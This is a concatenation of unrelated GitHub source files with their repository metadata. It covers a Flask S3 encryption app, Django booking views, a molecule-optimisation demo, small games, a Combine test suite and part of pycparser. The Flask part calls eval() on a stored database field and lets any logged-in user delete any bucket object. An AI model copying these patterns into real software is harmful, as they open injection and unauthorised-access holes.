        source2 = os.path.join(source1, file.filename+".enc key.txt")
        # keydir is stored as the str() of a dict mapping object name ->
        # derived key bytes; eval() round-trips it.  NOTE(review): eval on
        # a DB field is only safe while the field is never user-writable.
        keydir = eval(user.keydir)
        keydir[file.filename+".enc"] = key
        user.keydir = str(keydir)
        db.session.commit()
        with open(source2, "w") as file1:
            file1.write(res)
            file1.close()
        flash('File uploaded successfully')
        return send_file(source2, as_attachment=True)
    return redirect(url_for('files'))
@auth.route('/upload', methods=['POST'])
@login_required
def upload():
    """Upload a file to the S3 bucket as-is (no encryption)."""
    file = request.files['file']
    if(file.filename==''):
        flash('No file selected')
    if(file):
        my_bucket = get_bucket()
        my_bucket.Object(file.filename).put(Body=file)
        flash('File uploaded successfully')
    return redirect(url_for('files'))
@auth.route('/delete', methods=['POST'])
@login_required
def delete():
    """Delete an object from the S3 bucket by its key."""
    key = request.form['key']
    my_bucket = get_bucket()
    my_bucket.Object(key).delete()
    flash('File deleted successfully')
    return redirect(url_for('files'))
@auth.route('/download', methods=['POST'])
@login_required
def download():
    """Stream a plain S3 object; route .enc objects via the key-entry page."""
    from app import current_user
    user = User.query.get_or_404(current_user.id)
    key = request.form['key']
    if('.enc' == key[-4:]):
        # Remember which object the user wants, then ask for its key.
        user.download = key
        db.session.commit()
        return redirect(url_for('auth.download1'))
    elif('.enc' != key[-4:]):
        my_bucket = get_bucket()
        file_obj = my_bucket.Object(key).get()
        return Response(
            file_obj['Body'].read(),
            mimetype='text/plain',
            headers={"Content-Disposition": "attachment;filename={}".format(key)}
        )
@auth.route('/download1')
@login_required
def download1():
    """Render the key-entry form for downloading an encrypted file."""
    return render_template('download1.html')
@auth.route('/download1', methods=['POST'])
@login_required
def download1_post():
    """Verify the supplied key and serve the matching plaintext file.

    The key is sha256-hashed and compared with the stored digest.
    NOTE(review): the file is served from the local ./uploads cache (the
    pre-encryption copy), not decrypted from S3 -- it fails if that local
    copy was removed.
    """
    from app import current_user
    seckey = request.form['seckey']
    seckey = bytes(seckey, 'utf-8')
    seckey = hashlib.sha256(seckey).digest()
    user = User.query.get_or_404(current_user.id)
    key = user.download
    keydir = eval(user.keydir)
    source = os.path.join(app_root,'uploads')
    if(keydir[key]==seckey):
        # key ends in ".enc"; strip it to get the original file name.
        loc0 = os.path.join(source,key[:-4])
        # flash('Your Download is Ready!')
        return send_file(loc0, as_attachment=True)
    else:
        flash('Please Enter the Correct Key')
        return redirect(url_for('auth.download1'))
| [
"noreply@github.com"
] | tanvipenumudy.noreply@github.com |
b606b3dc678ce2db8c05942a074cf21356cde599 | 0700ad1f938076f48fe7cc0ea6883d30251ed69d | /booking/views.py | fa191b235f2727e29e1dede09888ea8cd92b9a94 | [] | no_license | gskansarag/theatre_project | 5d8b10c4dd5dd530ca561cb255172828004cb4c8 | 882c3fbb6dfe96284212c2a71165d94c89f24e21 | refs/heads/master | 2020-07-26T06:53:47.061484 | 2019-09-15T09:34:48 | 2019-09-15T09:34:48 | 208,569,632 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,896 | py | from django.shortcuts import render, get_object_or_404
from myapp.models import Booking, BookedSeat, Seat
from myapp.models import Show
from myapp.forms import SeatForm, BookingForm
from django.urls import reverse_lazy
#from django.views.generic import CreateView
import datetime
from django.views.generic import ListView,DetailView,DeleteView
from myapp.models import Theatre
from django.shortcuts import redirect
from django.http.response import Http404
# Create your views here.
def reserve_seat(request, show_id):
    """Render the seat-selection page for one show.

    Raises Http404 when the show does not exist.
    """
    try:
        show_info = Show.objects.get(pk=show_id)
    # BUG FIX: the query is on Show, but the handler caught
    # Theatre.DoesNotExist, so a missing show raised an unhandled
    # Show.DoesNotExist (HTTP 500) instead of the intended 404.
    except Show.DoesNotExist:
        raise Http404("Page does not exist")
    form = SeatForm()
    return render(request, 'reserve_seat.html',
                  {'show_info': show_info, 'form': form})
def payment_gateway(request):
    """Reserve the chosen seats and show the payment form.

    Expects POST fields 'selected_seat' (comma-separated seat numbers),
    'seat_type' and 'show_id'.  If any requested seat is already taken,
    the user is bounced back to the seat-selection page.
    """
    if request.POST:
        seats = request.POST.get('selected_seat')
        seat_type = request.POST.get('seat_type')
        show_id = request.POST.get('show_id')
        show = Show.objects.get(pk=show_id)
        seats = seats.split(',')
        book_seat = []
        for each in seats:
            # NOTE(review): check-then-create is racy under concurrent
            # bookings; a unique constraint on (no, show) would be safer.
            if Seat.objects.filter(no=each, show=show).exists():
                return render(request, 'reserve_seat.html',
                              {'show_info': show, 'form': SeatForm()})
            s = Seat(no=each, seat_type=seat_type, show=show)
            book_seat.append(s)
        Seat.objects.bulk_create(book_seat)
        form = BookingForm()
        price_dict = {'Platinum': 300, 'Gold': 200, 'Silver': 100}
        ticket_price = price_dict[seat_type]*len(book_seat)
        # IMPROVEMENT: the manual index loop that rebuilt the comma-joined
        # string is exactly str.join; same output, far clearer.
        seat_str = ','.join(seats)
        return render(request, 'payment_gateway.html',
                      {'seats': seat_str, 'seat_type': seat_type,
                       'show': show, 'form': form, 'ticket_price': ticket_price})
    else:
        return redirect('theatre.views.theatre_list')
def payment_confirmation(request):
    """Record the payment and mark the reserved seats as booked."""
    if request.POST:
        show_id = request.POST.get('show_id')
        show = Show.objects.get(pk=show_id)
        seats = request.POST.get('selected_seat')
        seats = seats.split(',')
        timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        payment_type = request.POST.get('payment_type')
        paid_amount = request.POST.get('amount')
        paid_by = request.user
        # Booking primary key is derived from show + seats + payment time.
        # NOTE(review): `id` shadows the builtin; renaming would be cleaner.
        id = str(show) + str(seats) + timestamp
        book = Booking(id=id, timestamp=timestamp, payment_type=payment_type,
                       paid_amount=paid_amount, paid_by=paid_by)
        book.save()
        booked_seat = []
        for seat in seats:
            print(seat)
            s = Seat.objects.get(no=seat, show=show)
            b = Booking.objects.get(pk=id)
            booked = BookedSeat(seat=s, booking=b)
            booked_seat.append(booked)
        BookedSeat.objects.bulk_create(booked_seat)
        return render(request, 'payment_confirmation.html')
    else:
        return redirect('theatre.views.theatre_list')
class BookingListView(ListView):
    """List only the bookings paid for by the logged-in user."""
    def get_queryset(self):
        return Booking.objects.filter(paid_by=self.request.user)
class BookingDetailView(DetailView):
    """Detail page for one of the current user's bookings."""

    def get_queryset(self):
        # Restrict visibility to bookings paid for by the logged-in user.
        return Booking.objects.filter(paid_by=self.request.user)

    def get_object(self, *args, **kwargs):
        btid = self.kwargs.get('btid')
        # SECURITY FIX: the lookup previously ran against Booking.objects,
        # bypassing get_queryset(), so any authenticated user could view
        # any booking by guessing its id (an IDOR).  Scoping the lookup to
        # the user's own bookings makes other ids 404 instead.
        obj = get_object_or_404(self.get_queryset(), id=btid)
        return obj
class BookingDeleteView(DeleteView):
    """Confirm-and-delete view for one of the current user's bookings."""
    model = Booking
    success_url = reverse_lazy('booking:list')
    def get_object(self, *args, **kwargs):
        btid = self.kwargs.get('btid')
        # SECURITY FIX: the lookup previously ran against Booking.objects
        # with no ownership filter, so any authenticated user could delete
        # any booking by guessing its id (an IDOR).  Restrict deletion to
        # bookings owned by the requesting user; other ids now 404.
        obj = get_object_or_404(Booking, id=btid, paid_by=self.request.user)
        return obj
| [
"noreply@github.com"
] | gskansarag.noreply@github.com |
25184effa654599149299801de6745b7d7b11ca8 | cb56bba2bcb8fae10f738dbafacfe5d2e410e36f | /demo.py | 646de524e25703cc0d838a4ada07eb4c0357ca1a | [] | no_license | PeterEckmann1/generative-docking | 7c94a40049c8d761fea56e41bcd75e26ec1c3ef5 | 902bf3e0006087d827541c52546dd5d1e9d34f1b | refs/heads/master | 2023-07-18T04:19:16.269105 | 2021-09-07T22:29:26 | 2021-09-07T22:29:26 | 403,715,616 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,411 | py | import pandas as pd
import selfies as sf
import numpy as np
import torch
from torch.utils.data import TensorDataset, DataLoader
from torch.utils.data.dataset import random_split
from torch import nn
from torch import optim
import matplotlib.pyplot as plt
import torch.nn.functional as F
import os
import json
from rdkit.Chem.Crippen import MolLogP
from rdkit.Chem import MolFromSmiles
# fixes some conda issue
os.environ['KMP_DUPLICATE_LIB_OK'] = 'TRUE'
class Net(nn.Module):
def __init__(self, input_len):
super(Net, self).__init__()
self.fc = nn.Sequential(nn.Linear(input_len, 500),
nn.ReLU(),
nn.Linear(500, 500),
nn.ReLU(),
nn.Linear(500, 500),
nn.ReLU(),
nn.Linear(500, 1))
def forward(self, x):
return self.fc(x)
def logp(smiles):
return MolLogP(MolFromSmiles(smiles))
def preprocess_and_save_data(file, data_dir):
df = pd.read_csv(file, sep='\t')
df['SELFIES'] = df['SMILES'].apply(sf.encoder)
vocab = list(sorted(sf.get_alphabet_from_selfies(df['SELFIES']))) + ['[nop]']
symbol_to_idx = {symbol: i for i, symbol in enumerate(vocab)}
idx_to_symbol = {i: symbol for i, symbol in enumerate(vocab)}
max_len = df['SELFIES'].apply(sf.len_selfies).max()
df['encoded'] = df['SELFIES'].apply(sf.selfies_to_encoding, args=(symbol_to_idx, max_len, 'one_hot'))
x = torch.tensor(np.vstack(df['encoded'].apply(lambda x: np.array(x).flatten())), dtype=torch.float)
df['logP'] = df['SMILES'].apply(logp)
y = torch.tensor(df['logP'], dtype=torch.float).view((-1, 1))
torch.save(x, data_dir + '/x.pt')
torch.save(y, data_dir + '/y.pt')
json.dump({'symbol_to_idx': symbol_to_idx, 'idx_to_symbol': idx_to_symbol, 'max_len': int(max_len)}, open(data_dir + '/vocab.json', 'w'))
def load_data(data_dir):
x = torch.load(data_dir + '/x.pt').to('cuda')
y = torch.load(data_dir + '/y.pt').to('cuda')
vocab = json.load(open(data_dir + '/vocab.json', 'r'))
symbol_to_idx, idx_to_symbol, max_len = vocab['symbol_to_idx'], vocab['idx_to_symbol'], vocab['max_len']
idx_to_symbol = {int(key): idx_to_symbol[key] for key in idx_to_symbol}
dataset = TensorDataset(x, y)
train_data, test_data = random_split(dataset, [int(round(len(dataset) * 0.8)), int(round(len(dataset) * 0.2))])
train_dataloader, test_dataloader = DataLoader(train_data, batch_size=10000, shuffle=True), DataLoader(test_data, batch_size=10000)
return train_dataloader, test_dataloader, symbol_to_idx, idx_to_symbol, max_len, x.mean(dim=0)
def train(model, train_dataloader, test_dataloader):
loss_f = nn.MSELoss()
optimizer = optim.Adam(model.parameters(), lr=0.001)
for epoch in range(30):
for x_batch, y_batch in train_dataloader:
optimizer.zero_grad()
loss = loss_f(model(x_batch), y_batch)
loss.backward()
optimizer.step()
with torch.no_grad():
total_loss = 0
for x_batch, y_batch in test_dataloader:
total_loss += loss_f(model(x_batch), y_batch).item()
torch.save(model.state_dict(), 'model.pt')
def indices_to_smiles(indices, idx_to_symbol):
selfies = ''.join([idx_to_symbol[idx] for idx in indices])
return sf.decoder(selfies)
def dream(model, starting_one_hot, target, base_props):
target_tensor = torch.tensor([[target]], dtype=torch.float).to('cuda')
old_smiles = ''
in_selfies = starting_one_hot
in_selfies += base_props * 2
#in_selfies += torch.rand(in_selfies.shape, device='cuda') * 0.95
in_selfies[in_selfies > 1] = 1
in_selfies = in_selfies.clone().detach().view((1, -1)).requires_grad_(True)
reverse_optimizer = optim.Adam([in_selfies], lr=0.1)
loss_f = nn.MSELoss()
vals = []
losses = []
for epoch in range(1000):
out = model(in_selfies)
loss = loss_f(out, target_tensor)
indices = in_selfies.detach().view((max_len, -1)).argmax(dim=1).tolist()
smiles = indices_to_smiles(indices, idx_to_symbol)
losses.append(out.item())
if smiles != old_smiles:
# print(f"New molecule: logP: {logp(smiles)}, SMILES: {smiles}")
vals.append(logp(smiles))
old_smiles = smiles
else:
vals.append(vals[-1])
reverse_optimizer.zero_grad()
loss.backward()
reverse_optimizer.step()
return old_smiles, vals
if __name__ == '__main__':
# preprocess_and_save_data('gdb11_size09.smi', 'data')
train_dataloader, test_dataloader, symbol_to_idx, idx_to_symbol, max_len, base_probs = load_data('data')
model = Net(max_len * len(symbol_to_idx)).to('cuda')
# train(model, train_dataloader, test_dataloader)
model.load_state_dict(torch.load('model.pt'))
x_batch, y_batch = next(iter(test_dataloader))
# plt.scatter(model(x_batch).detach().cpu(), y_batch.detach().cpu())
# plt.xlabel('pred')
# plt.ylabel('true')
# plt.show()
improvement_count = 0
from tqdm import tqdm
for i in tqdm(range(100)):
final_smiles, vals = dream(model, x_batch[i], -10, base_probs) #0.84 for 10, 0.89 for -10
improvement_count += int(vals[0] > vals[-1])
print(improvement_count / 100) | [
"53533143+PeterEckmann1@users.noreply.github.com"
] | 53533143+PeterEckmann1@users.noreply.github.com |
5a0689b56e34243ab30eb32f05df0bc1514a5bad | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03067/s147995985.py | b0a0627bbb6722c53ac100738e690e3079cdcbd7 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 112 | py | A, B, C = map(int, input().split())
if min(A, B) <= C and C <= max(A, B):
print("Yes")
else:
print("No") | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
c29730d6ee55732f95e7e027a60327bbf3383550 | 41893a5ea841ed882a20d94b7376790e1ce3cfac | /score.py | 6db8386ff60bea633e05969b93ac645e00a7a120 | [] | no_license | Hershey435/Feed-The-Snake | 1edd612cf3b548489b5fcc75da31e7a5c9b7d987 | 30447c178358f0864dcc6ed73609b13d19793b40 | refs/heads/main | 2023-07-19T01:23:23.334398 | 2021-09-02T04:59:07 | 2021-09-02T04:59:07 | 397,253,802 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,013 | py | from turtle import Turtle
class Score(Turtle):
def __init__(self):
super().__init__()
self.score = 0
with open("data.txt") as f:
self.high = int(f.read())
self.color("white")
self.penup()
self.goto(0, 280)
self.update_score()
self.hideturtle()
self.goto(0, 270)
def update_score(self):
self.clear()
self.write(f"Score: {self.score} High Score: {self.high}", align="center", font=("Courier", 16, "normal"))
# def game_over(self):
# self.goto(0, 0)
# self.write("Game Over.", align="center", font=("Courier", 20, "normal"))
def reset_score(self):
if self.score > self.high:
with open("data.txt", mode="w") as f:
self.high = self.score
f.write(f"{self.high}")
self.score = 0
self.update_score()
def add_score(self):
self.score += 1
self.update_score()
| [
"noreply@github.com"
] | Hershey435.noreply@github.com |
532d89547b5dd02006bf30fab9400d191eb7d6f2 | bdcf17ed0f5c4e721416787b918048686cbea9d1 | /Day2/02_Module/simplesetTest.py | 258a56fe3c9025fa78046c9ee547c03c20122399 | [] | no_license | makemeha2/PythonEdu | 14ed10447159ae8ed411803fab441c81127b90ad | e67715e526188f2b5b7ab48d42ecec08020e426f | refs/heads/master | 2020-04-12T17:45:44.411905 | 2018-12-21T04:55:20 | 2018-12-21T04:55:20 | 162,656,235 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 290 | py | import sys
import simpleset
#sys.path.append()
print(sys.path)
setA = [1,3,7,10,13]
setB = [2,3,4,9,13]
#print(simpleset.intersect(setA, setB))
#print(simpleset.union(setA, setB))
#print(simpleset.difference(setA, setB))
print(simpleset.__intersectSC(setA, setB))
#print(dir(simpleset)) | [
"makemeha2@gmail.com"
] | makemeha2@gmail.com |
c1cc8dfadc0e15df62d780c5aba4b5aec12b5aab | 526548bbfc5629adee9c4c3865625421580f29fc | /tests/test_basic.py | 636d3d76484a9a6aaae651d92764a18138a3d122 | [
"MIT"
] | permissive | mlibrary/combine | ad8f7ed8b12d95daa770b1d20b6ba92b2531fca1 | 05a67ad30fb31d3fc13fda9c18337d5919409c14 | refs/heads/master | 2023-03-16T05:35:27.994270 | 2019-04-19T17:10:36 | 2019-04-19T17:10:36 | 182,845,536 | 1 | 0 | null | 2019-04-22T18:33:43 | 2019-04-22T18:33:43 | null | UTF-8 | Python | false | false | 11,704 | py |
import django
from lxml import etree
import os
import pytest
import shutil
import sys
import time
import uuid
# logging
import logging
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
# setup django environment
# init django settings file to retrieve settings
os.environ['DJANGO_SETTINGS_MODULE'] = 'combine.settings'
sys.path.append('/opt/combine')
django.setup()
from django.conf import settings
# import core
from core.models import *
# global variables object "VO"
class Vars(object):
'''
Object to capture and store variables used across tests
'''
def __init__(self):
# combine user
self.user = User.objects.filter(username='combine').first()
VO = Vars()
#############################################################################
# Tests Setup
#############################################################################
def test_livy_start_session(use_active_livy):
'''
Test Livy session can be started
'''
# if use active livy
if use_active_livy:
VO.livy_session = LivySession.get_active_session()
VO.livy_session.refresh_from_livy()
# create livy session
else:
# start livy session
VO.livy_session = LivySession()
VO.livy_session.start_session()
# poll until session idle, limit to 60 seconds
for x in range(0,240):
# pause
time.sleep(1)
# refresh session
VO.livy_session.refresh_from_livy()
logger.info(VO.livy_session.status)
# check status
if VO.livy_session.status != 'idle':
continue
else:
break
# assert
assert VO.livy_session.status == 'idle'
def test_organization_create():
'''
Test creation of organization
'''
# instantiate and save
VO.org = Organization(
name='test_org_%s' % uuid.uuid4().hex,
description=''
)
VO.org.save()
assert type(VO.org.id) == int
def test_record_group_create():
'''
Test creation of record group
'''
# instantiate and save
VO.rg = RecordGroup(
organization=VO.org,
name='test_record_group_%s' % uuid.uuid4().hex,
description='',
publish_set_id='test_record_group_pub_id'
)
VO.rg.save()
assert type(VO.rg.id) == int
#############################################################################
# Test Harvest
#############################################################################
def prepare_records():
'''
Unzip 250 MODS records to temp location, feed to test_static_harvest()
'''
# parse file
xml_tree = etree.parse('tests/data/mods_250.xml')
xml_root = xml_tree.getroot()
# get namespaces
nsmap = {}
for ns in xml_root.xpath('//namespace::*'):
if ns[0]:
nsmap[ns[0]] = ns[1]
# find mods records
mods_roots = xml_root.xpath('//mods:mods', namespaces=nsmap)
# create temp dir
payload_dir = '/tmp/%s' % uuid.uuid4().hex
os.makedirs(payload_dir)
# write MODS to temp dir
for mods in mods_roots:
with open(os.path.join(payload_dir, '%s.xml' % uuid.uuid4().hex), 'w') as f:
f.write(etree.tostring(mods).decode('utf-8'))
# return payload dir
return payload_dir
def test_static_harvest():
'''
Test static harvest of XML records from disk
'''
# prepare test data
payload_dir = prepare_records()
# build payload dictionary
payload_dict = {
'type':'location',
'payload_dir':payload_dir,
'xpath_document_root':'/mods:mods',
'xpath_record_id':''
}
# initiate job
cjob = HarvestStaticXMLJob(
job_name='test_static_harvest',
job_note='',
user=VO.user,
record_group=VO.rg,
index_mapper='GenericMapper',
payload_dict=payload_dict
)
# start job and update status
job_status = cjob.start_job()
# if job_status is absent, report job status as failed
if job_status == False:
cjob.job.status = 'failed'
cjob.job.save()
# poll until complete
for x in range(0,240):
# pause
time.sleep(1)
# refresh session
cjob.job.update_status()
# check status
if cjob.job.status != 'available':
continue
else:
break
# save static harvest job to VO
VO.static_harvest_cjob = cjob
# remove payload_dir
shutil.rmtree(payload_dir)
# assert job is done and available via livy
assert VO.static_harvest_cjob.job.status == 'available'
# assert record count is 250
dcount = VO.static_harvest_cjob.get_detailed_job_record_count()
assert dcount['records'] == 250
assert dcount['errors'] == 0
# assert no indexing failures
assert len(VO.static_harvest_cjob.get_indexing_failures()) == 0
#############################################################################
# Test Transform
#############################################################################
def prepare_transform():
'''
Create temporary transformation scenario based on tests/data/mods_transform.xsl
'''
with open('tests/data/mods_transform.xsl','r') as f:
xsl_string = f.read()
trans = Transformation(
name='temp_mods_transformation',
payload=xsl_string,
transformation_type='xslt',
filepath='will_be_updated'
)
trans.save()
# return transformation
return trans
def test_static_transform():
'''
Test static harvest of XML records from disk
'''
# prepare and capture temporary transformation scenario
VO.transformation_scenario = prepare_transform()
# initiate job
cjob = TransformJob(
job_name='test_static_transform_job',
job_note='',
user=VO.user,
record_group=VO.rg,
input_job=VO.static_harvest_cjob.job,
transformation=VO.transformation_scenario,
index_mapper='GenericMapper'
)
# start job and update status
job_status = cjob.start_job()
# if job_status is absent, report job status as failed
if job_status == False:
cjob.job.status = 'failed'
cjob.job.save()
# poll until complete
for x in range(0,240):
# pause
time.sleep(1)
# refresh session
cjob.job.update_status()
# check status
if cjob.job.status != 'available':
continue
else:
break
# save static harvest job to VO
VO.static_transform_cjob = cjob
# assert job is done and available via livy
assert VO.static_transform_cjob.job.status == 'available'
# assert record count is 250
dcount = VO.static_transform_cjob.get_detailed_job_record_count()
assert dcount['records'] == 250
assert dcount['errors'] == 0
# assert no indexing failures
assert len(VO.static_transform_cjob.get_indexing_failures()) == 0
# remove transformation
assert VO.transformation_scenario.delete()[0] > 0
#############################################################################
# Test Validation Scenarios
#############################################################################
def test_add_schematron_validation_scenario():
'''
Add schematron validation
'''
# get schematron validation from test data
with open('tests/data/schematron_validation.sch','r') as f:
sch_payload = f.read()
# init new validation scenario
schematron_validation_scenario = ValidationScenario(
name='temp_vs_%s' % str(uuid.uuid4()),
payload=sch_payload,
validation_type='sch',
default_run=False
)
schematron_validation_scenario.save()
# pin to VO
VO.schematron_validation_scenario = schematron_validation_scenario
# assert creation
assert type(VO.schematron_validation_scenario.id) == int
def test_add_python_validation_scenario():
'''
Add python code snippet validation
'''
# get python validation from test data
with open('tests/data/python_validation.py','r') as f:
py_payload = f.read()
# init new validation scenario
python_validation_scenario = ValidationScenario(
name='temp_vs_%s' % str(uuid.uuid4()),
payload=py_payload,
validation_type='python',
default_run=False
)
python_validation_scenario.save()
# pin to VO
VO.python_validation_scenario = python_validation_scenario
# assert creation
assert type(VO.python_validation_scenario.id) == int
def test_schematron_validation():
# get target records
VO.harvest_record = VO.static_harvest_cjob.job.get_records().first()
VO.transform_record = VO.static_transform_cjob.job.get_records().first()
# validate harvest record with schematron
'''
expecting failure count of 2
'''
vs_results = VO.schematron_validation_scenario.validate_record(VO.harvest_record)
assert vs_results['parsed']['fail_count'] == 2
# validate transform record with schematron
'''
expecting failure count of 1
'''
vs_results = VO.schematron_validation_scenario.validate_record(VO.transform_record)
assert vs_results['parsed']['fail_count'] == 1
def test_python_validation():
# validate harvest record with python
'''
expecting failure count of 1
'''
vs_results = VO.python_validation_scenario.validate_record(VO.harvest_record)
print(vs_results)
assert vs_results['parsed']['fail_count'] == 1
# validate transform record with python
'''
expecting failure count of 1
'''
vs_results = VO.python_validation_scenario.validate_record(VO.transform_record)
print(vs_results)
assert vs_results['parsed']['fail_count'] == 1
#############################################################################
# Test Duplicate/Merge Job
#############################################################################
def test_duplicate():
'''
Duplicate Transform job, applying newly created validation scenarios
'''
# initiate job
cjob = MergeJob(
job_name='test_merge_job_with_validation',
job_note='',
user=VO.user,
record_group=VO.rg,
input_jobs=[VO.static_transform_cjob.job],
index_mapper='GenericMapper',
validation_scenarios=[VO.schematron_validation_scenario.id, VO.python_validation_scenario.id]
)
# start job and update status
job_status = cjob.start_job()
# if job_status is absent, report job status as failed
if job_status == False:
cjob.job.status = 'failed'
cjob.job.save()
# poll until complete
for x in range(0,240):
# pause
time.sleep(1)
# refresh session
cjob.job.update_status()
# check status
if cjob.job.status != 'available':
continue
else:
break
# save static harvest job to VO
VO.merge_cjob = cjob
# assert job is done and available via livy
assert VO.merge_cjob.job.status == 'available'
# assert record count is 250
dcount = VO.merge_cjob.get_detailed_job_record_count()
assert dcount['records'] == 250
assert dcount['errors'] == 0
# assert validation scenarios applied
job_validation_scenarios = VO.merge_cjob.job.jobvalidation_set.all()
assert job_validation_scenarios.count() == 2
# loop through validation scenarios and confirm that both show 250 failures
for jv in job_validation_scenarios:
assert jv.get_record_validation_failures().count() == 250
# assert no indexing failures
assert len(VO.merge_cjob.get_indexing_failures()) == 0
#############################################################################
# Tests Teardown
#############################################################################
def test_org_delete(keep_records):
'''
Test removal of organization with cascading deletes
'''
# assert delete of org and children
if not keep_records:
assert VO.org.delete()[0] > 0
else:
assert True
def test_validation_scenario_teardown():
assert VO.schematron_validation_scenario.delete()[0] > 0
assert VO.python_validation_scenario.delete()[0] > 0
def test_livy_stop_session(use_active_livy):
'''
Test Livy session can be stopped
'''
if use_active_livy:
assert True
# stop livy session used for testing
else:
# attempt stop
VO.livy_session.stop_session()
# poll until session idle, limit to 60 seconds
for x in range(0,240):
# pause
time.sleep(1)
# refresh session
VO.livy_session.refresh_from_livy()
logger.info(VO.livy_session.status)
# check status
if VO.livy_session.status != 'gone':
continue
else:
VO.livy_session.delete()
break
# assert
assert VO.livy_session.status == 'gone'
| [
"ghukill@gmail.com"
] | ghukill@gmail.com |
5fdfc59a41b4f23fa1d960d5d5f5f25ecc7d8e11 | 7f1b75007f5a6c633ac2b74cfb3809efc0fa6f78 | /pycparser/pycparser/c_parser.py | 1fc51cb87fa838b2037c1d2a3ecd68673a724e8a | [
"BSD-3-Clause"
] | permissive | gongmingli/C_VIZ | 1316cd04cecb364ee566f597e010f3f63f3334b1 | c35bbeb46b8dec2e5ddd52dd7775830d8a83a3ac | refs/heads/main | 2023-03-20T02:33:38.622019 | 2021-03-14T10:28:24 | 2021-03-14T10:28:24 | 347,604,615 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 70,027 | py | #------------------------------------------------------------------------------
# pycparser: c_parser.py
#
# CParser class: Parser and AST builder for the C language
#
# Eli Bendersky [https://eli.thegreenplace.net/]
# License: BSD
#------------------------------------------------------------------------------
import re
from .ply import yacc
from . import c_ast
from .c_lexer import CLexer
from .plyparser import PLYParser, Coord, ParseError, parameterized, template
from .ast_transforms import fix_switch_cases
@template
class CParser(PLYParser):
    def __init__(
            self,
            lex_optimize=True,
            lexer=CLexer,
            lextab='pycparser.lextab',
            yacc_optimize=True,
            yacctab='pycparser.yacctab',
            yacc_debug=False,
            taboutputdir=''):
        """ Create a new CParser.

            Some arguments for controlling the debug/optimization
            level of the parser are provided. The defaults are
            tuned for release/performance mode.
            The simple rules for using them are:
            *) When tweaking CParser/CLexer, set these to False
            *) When releasing a stable parser, set to True

            lex_optimize:
                Set to False when you're modifying the lexer.
                Otherwise, changes in the lexer won't be used, if
                some lextab.py file exists.
                When releasing with a stable lexer, set to True
                to save the re-generation of the lexer table on
                each run.

            lexer:
                Set this parameter to define the lexer to use if
                you're not using the default CLexer.

            lextab:
                Points to the lex table that's used for optimized
                mode. Only if you're modifying the lexer and want
                some tests to avoid re-generating the table, make
                this point to a local lex table file (that's been
                earlier generated with lex_optimize=True)

            yacc_optimize:
                Set to False when you're modifying the parser.
                Otherwise, changes in the parser won't be used, if
                some parsetab.py file exists.
                When releasing with a stable parser, set to True
                to save the re-generation of the parser table on
                each run.

            yacctab:
                Points to the yacc table that's used for optimized
                mode. Only if you're modifying the parser, make
                this point to a local yacc table file

            yacc_debug:
                Generate a parser.out file that explains how yacc
                built the parsing table from the grammar.

            taboutputdir:
                Set this parameter to control the location of generated
                lextab and yacctab files.
        """
        # The lexer must be created and built first: yacc.yacc() below
        # needs the token list that the lexer defines. The callbacks wire
        # the lexer back into this parser's scope/typedef tracking.
        self.clex = lexer(
            error_func=self._lex_error_func,
            on_lbrace_func=self._lex_on_lbrace_func,
            on_rbrace_func=self._lex_on_rbrace_func,
            type_lookup_func=self._lex_type_lookup_func)

        self.clex.build(
            optimize=lex_optimize,
            lextab=lextab,
            outputdir=taboutputdir)
        self.tokens = self.clex.tokens

        # For each rule name listed here, an additional "<rule>_opt"
        # production (rule or empty) is generated; the names must match
        # rules defined by the p_* methods of this class.
        rules_with_opt = [
            'abstract_declarator',
            'assignment_expression',
            'declaration_list',
            'declaration_specifiers_no_type',
            'designation',
            'expression',
            'identifier_list',
            'init_declarator_list',
            'id_init_declarator_list',
            'initializer_list',
            'parameter_type_list',
            'block_item_list',
            'type_qualifier_list',
            'struct_declarator_list'
        ]

        for rule in rules_with_opt:
            self._create_opt_rule(rule)

        # Build (or load, in optimized mode) the LALR parsing tables from
        # the grammar encoded in the p_* method docstrings.
        self.cparser = yacc.yacc(
            module=self,
            start='translation_unit_or_empty',
            debug=yacc_debug,
            optimize=yacc_optimize,
            tabmodule=yacctab,
            outputdir=taboutputdir)

        # Stack of scopes for keeping track of symbols. _scope_stack[-1] is
        # the current (topmost) scope. Each scope is a dictionary that
        # specifies whether a name is a type. If _scope_stack[n][name] is
        # True, 'name' is currently a type in the scope. If it's False,
        # 'name' is used in the scope but not as a type (for instance, if we
        # saw: int name;
        # If 'name' is not a key in _scope_stack[n] then 'name' was not defined
        # in this scope at all.
        self._scope_stack = [dict()]

        # Keeps track of the last token given to yacc (the lookahead token)
        self._last_yielded_token = None
def parse(self, text, filename='', debuglevel=0):
""" Parses C code and returns an AST.
text:
A string containing the C source code
filename:
Name of the file being parsed (for meaningful
error messages)
debuglevel:
Debug level to yacc
"""
self.clex.filename = filename
self.clex.reset_lineno()
self._scope_stack = [dict()]
self._last_yielded_token = None
return self.cparser.parse(
input=text,
lexer=self.clex,
debug=debuglevel)
######################-- PRIVATE --######################
def _push_scope(self):
self._scope_stack.append(dict())
def _pop_scope(self):
assert len(self._scope_stack) > 1
self._scope_stack.pop()
def _add_typedef_name(self, name, coord):
""" Add a new typedef name (ie a TYPEID) to the current scope
"""
if not self._scope_stack[-1].get(name, True):
self._parse_error(
"Typedef %r previously declared as non-typedef "
"in this scope" % name, coord)
self._scope_stack[-1][name] = True
def _add_identifier(self, name, coord):
""" Add a new object, function, or enum member name (ie an ID) to the
current scope
"""
if self._scope_stack[-1].get(name, False):
self._parse_error(
"Non-typedef %r previously declared as typedef "
"in this scope" % name, coord)
self._scope_stack[-1][name] = False
def _is_type_in_scope(self, name):
""" Is *name* a typedef-name in the current scope?
"""
for scope in reversed(self._scope_stack):
